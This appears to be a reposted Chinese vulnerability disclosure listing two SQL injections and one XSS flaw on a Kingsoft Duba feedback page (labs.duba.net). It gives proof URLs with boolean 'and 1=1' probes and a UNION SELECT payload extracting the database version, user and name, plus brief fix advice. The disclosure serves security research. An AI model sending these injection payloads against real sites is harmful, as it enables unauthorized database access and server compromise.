金山毒霸多个sql注入及XSS漏洞和修复_漏洞分析_网络安全_

　　第一个

　　简要描述：由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限

　　详细说明：http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

　　漏洞证明：http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

　　http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

　　结果明显不同 注入漏洞产生

　　修复方案：过滤变量app

　　第二个

　　简要描述：过滤不严导致存在SQL注入

　　详细说明：过滤不严导致存在SQL注入 有机会拿下服务器权限

　　漏洞证明：http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--

　　http://labs.duba.net/robots.txt

　　未作进一步测试

　　修复方案：过滤参数

　　第三个：

　　简要描述：留言处过滤不严 造成跨站漏洞

　　详细说明：留言处过滤不严 造成跨站漏洞

　　漏洞证明：http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

提示： 本文由神整理自网络，如有侵权请联系本站删除！
本站声明：
1、本站所有资源均来源于互联网，不保证100%完整、不提供任何技术支持；
2、本站所发布的文章以及附件仅限用于学习和研究目的;不得将用于商业或者非法用途；否则由此产生的法律后果，本站概不负责！